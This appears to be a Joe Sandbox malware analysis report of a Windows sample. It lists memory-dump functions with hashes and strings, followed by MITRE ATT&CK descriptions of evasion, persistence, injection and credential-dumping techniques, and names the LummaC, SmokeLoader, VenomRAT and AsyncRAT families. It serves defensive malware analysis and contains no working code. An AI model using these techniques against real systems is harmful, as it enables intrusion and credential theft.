Function 00007FF7648B11F0 Relevance: 7.0, Strings: 5, Instructions: 718COMMON

Download Yara Rule

Strings

U1Of, xrefs: 00007FF7648B17B0
n5, xrefs: 00007FF7648B15D7
U1Of, xrefs: 00007FF7648B17F1
U1Of, xrefs: 00007FF7648B1686
T1Of, xrefs: 00007FF7648B139C

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: T1Of$U1Of$U1Of$U1Of$n5
API String ID: 0-4219401299
Opcode ID: 156d973a6913e7ebed99fc9eb6a973d56276dfb1d76b04b459c2c9c134cb810a
Instruction ID: 97b43fb5e4736991690707d68ace344fbb29a2e68d9c3cf69345c6e741f02ff3
Opcode Fuzzy Hash: 156d973a6913e7ebed99fc9eb6a973d56276dfb1d76b04b459c2c9c134cb810a
Instruction Fuzzy Hash: 9D621D26A1C393CAE7749F5360C067EEE50EF557D0FA44032DE8C1BB96CA2DD8608B65

Function 00007FF764865AD4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

]t{, xrefs: 00007FF7648660AD
]t{, xrefs: 00007FF76486608B

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: ]t{$]t{
API String ID: 0-2389501032
Opcode ID: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
Instruction ID: ef5970a17c5478af94f31e7770a0583b01a4ab8c4aae244342e11dbbe8ba202a
Opcode Fuzzy Hash: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
Instruction Fuzzy Hash: 84B1B221D0D383E7FAFC7E2660E423DD5916F90301EE4103AE55F76AD7CD9DA8A04662

Function 00007FF7648E6B70 Relevance: 5.5, Strings: 4, Instructions: 512COMMON

Download Yara Rule

Strings

wtx^, xrefs: 00007FF7648E6EF1
wtx^, xrefs: 00007FF7648E6C16
wnZ:, xrefs: 00007FF7648E6F50
wnZ:, xrefs: 00007FF7648E708A

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: wnZ:$wnZ:$wtx^$wtx^
API String ID: 0-3875597248
Opcode ID: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
Instruction ID: d191b8706e3383b6ac0b02c590d0154fa7d164fb1a4446f6501ea39ac3a0c558
Opcode Fuzzy Hash: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
Instruction Fuzzy Hash: 7A222962D0CE8BC5EA34EE17E48063BEE54BB9079CFD09431DE9A17B98CA7CD4504B15

Function 00007FF7648C898B Relevance: 4.4, Strings: 3, Instructions: 688COMMON

Download Yara Rule

Strings

W}:!, xrefs: 00007FF7648CB520
[[\, xrefs: 00007FF7648C8CF8
*FN, xrefs: 00007FF7648C9351

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: *FN$W}:!$[[\
API String ID: 0-977268304
Opcode ID: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
Instruction ID: 6fd74d17dafa96a1066b3479398b5b9de189315f5d520a7a84c546956649e420
Opcode Fuzzy Hash: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
Instruction Fuzzy Hash: 1462F922A08BC3CAEB745F3A98C03FD6390EB44759F500532DA4D8B794DF29D6A49B52

Function 00007FF7648E49F0 Relevance: 4.3, Strings: 3, Instructions: 532COMMON

Download Yara Rule

Strings

:.i, xrefs: 00007FF7648E4C53
:.i, xrefs: 00007FF7648E4C60
:.i, xrefs: 00007FF7648E53A3

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: :.i$:.i$:.i
API String ID: 0-2131094505
Opcode ID: 3b60b99af8d6a4cc2720914cd319dbf41b638c4fd23604b3d10f052ebded4ee4
Instruction ID: c7a4970fbd58a658f80e39fe23c76e2e3f5bf63918b893059e066d8f0cc7b10a
Opcode Fuzzy Hash: 3b60b99af8d6a4cc2720914cd319dbf41b638c4fd23604b3d10f052ebded4ee4
Instruction Fuzzy Hash: 8732BB2241CB86C5E616DE27E04013BEF6CFB91791F409722EEDB37668CB7CD4528A24

Function 00007FF76487CFF0 Relevance: 4.2, Strings: 3, Instructions: 422COMMON

Download Yara Rule

Strings

@W, xrefs: 00007FF76487D0E1
@W, xrefs: 00007FF76487D0D6
@W, xrefs: 00007FF76487D672

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: @W$@W$@W
API String ID: 0-4000198689
Opcode ID: f828dc5048065b2a4ea36b46b74603e476538ee5a3cf911f238680742ef889af
Instruction ID: 8d8a137d108cd91a5cd0cbcced23bbda9310c65430690594350d803aa66fbf17
Opcode Fuzzy Hash: f828dc5048065b2a4ea36b46b74603e476538ee5a3cf911f238680742ef889af
Instruction Fuzzy Hash: B802FA25A0C243C6EA747E1AA0E0B3EE7D0BBC5300FA45136E98DD7795CD2DE8D19B51

Function 00007FF7648A57C0 Relevance: 4.2, Strings: 3, Instructions: 410COMMON

Download Yara Rule

Strings

*ls, xrefs: 00007FF7648A59FE
*ls, xrefs: 00007FF7648A58C7
*ls, xrefs: 00007FF7648A5D63

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: *ls$*ls$*ls
API String ID: 0-3118405165
Opcode ID: 6b274dccccb35f5f95b39d903b1cde6055285413bf085d91c5422f8376950b91
Instruction ID: dc4a9955cf93d55593c7be681b0cb7fc8ca16a221edbc48703ab354edd699962
Opcode Fuzzy Hash: 6b274dccccb35f5f95b39d903b1cde6055285413bf085d91c5422f8376950b91
Instruction Fuzzy Hash: BBF1E923E0D743C6EA649E1694C053FA6E0EB44364FE44936EA5DCAFD4CE6CD8E05712

Function 00007FF76488FC10 Relevance: 3.1, Strings: 2, Instructions: 572COMMON

Download Yara Rule

Strings

H3C&, xrefs: 00007FF764890400
H3C&, xrefs: 00007FF7648903F6

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: H3C&$H3C&
API String ID: 0-1770148612
Opcode ID: 293444d22200035bd8cd0b39f3f69fa6dd64bbc19e1a05dac3e0bea0ca0a8459
Instruction ID: 8721e1255de3e5f16b711a6b0dfeb1f274e99e894f1b5813ef69dcacf5a8606d
Opcode Fuzzy Hash: 293444d22200035bd8cd0b39f3f69fa6dd64bbc19e1a05dac3e0bea0ca0a8459
Instruction Fuzzy Hash: 18320E61A5CB43CBDA749E2A95C033EE292EBA6790FA00532DF5DC7B94CE2CF9504711

Function 00007FF76488A9D0 Relevance: 3.0, Strings: 2, Instructions: 489COMMON

Download Yara Rule

Strings

;:, xrefs: 00007FF76488B12B
;:, xrefs: 00007FF76488AB88

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: ;:$;:
API String ID: 0-2197980198
Opcode ID: 99c94250f0b0a1126aeeff1d3f389baf56e5bcdeae9a13661fc78fb5ba748f89
Instruction ID: 24ac613d7a663c17edce2b3db54b031b4301c6929fffd5e640383fd3f21165e6
Opcode Fuzzy Hash: 99c94250f0b0a1126aeeff1d3f389baf56e5bcdeae9a13661fc78fb5ba748f89
Instruction Fuzzy Hash: 2E02173BC0C6668B97259F1695C006AF691B784770F565621EEAB23BE4C73CDE808FD0

Function 00007FF76486FB70 Relevance: 2.8, Strings: 2, Instructions: 275COMMON

Download Yara Rule

Strings

W!, xrefs: 00007FF76486FC06
W!, xrefs: 00007FF76486FBA7

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: W!$W!
API String ID: 0-695975270
Opcode ID: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
Instruction ID: 8de6f202cb27674477d8eb669a8be561c2f3b49b6b4d0c5c8a461b2a7a62a0d6
Opcode Fuzzy Hash: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
Instruction Fuzzy Hash: C5B13B2BA0C243D7EAA49F2664D013EF6D3ABA5740FA45032FF89D7794CE2CD9548B11

Function 00007FF7648C4370 Relevance: .6, Instructions: 618COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
Instruction ID: 877b84c1b3cd0f8e1615d8e1ac41f142cada0fb1cd6e2fec541dac20e27e4767
Opcode Fuzzy Hash: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
Instruction Fuzzy Hash: 11428626A0D787C6DA749F16B4C067EE2E0EBC4B59FA05532DA4D87B98CE2CD4D04F11

Function 00007FF7648B7D60 Relevance: .6, Instructions: 583COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
Instruction ID: a5f14a0d176f6042d851b87d86cdc76e726c50dfe976109d50ff8fcdffc1e3e0
Opcode Fuzzy Hash: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
Instruction Fuzzy Hash: FB32EB31F5D743CEEA786E16A4D027EF392AF44B50FA00139E59E87B94CE2CE8518B51

Function 00007FF764877000 Relevance: .5, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
Instruction ID: 756fecbe97ff1c11337800d2e847982b85cf69b3be2a85d554ad8f1fbc518c19
Opcode Fuzzy Hash: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
Instruction Fuzzy Hash: B012E626A0C183C6EA74BE6A50F063EE691FB40304FA44436F69DC66D4DA2DF9D4CB61

Function 00007FF7648C2D70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF7648C2E0D

Strings

FA2, xrefs: 00007FF7648C2D85
FA2, xrefs: 00007FF7648C2DE0
PG<;, xrefs: 00007FF7648C2E2B
PG<;, xrefs: 00007FF7648C2DE7

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: FileRead
String ID: FA2$FA2$PG<;$PG<;
API String ID: 2738559852-1104478874
Opcode ID: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
Instruction ID: 6f6c7895acd583538994f7dae681782be285caad9826b4fff4801592f0d7f6c4
Opcode Fuzzy Hash: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
Instruction Fuzzy Hash: 13217612E0C38BC1EA303F16A4843BAA660AB55764F944633EF5DCA3D1CE3CD8518B60

Function 00007FF7648E57D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00007FF7648E5840

Strings

9qJ, xrefs: 00007FF7648E5820
9qJ, xrefs: 00007FF7648E57E1
8qJ, xrefs: 00007FF7648E5800

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID: 8qJ$9qJ$9qJ
API String ID: 3203483114-2728310733
Opcode ID: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
Instruction ID: 51f15eed942121a10ef58b77d9afe6c1b144ae2356cf409e1095b04434aad6de
Opcode Fuzzy Hash: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
Instruction Fuzzy Hash: 9801F715E0C227C2FA746E9B14E163E84829F55741FF15C32C80EC67A0ED2CD9A36329

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FpiUD4nYpj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: SmokeLoader

Threatname: VenomRAT

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

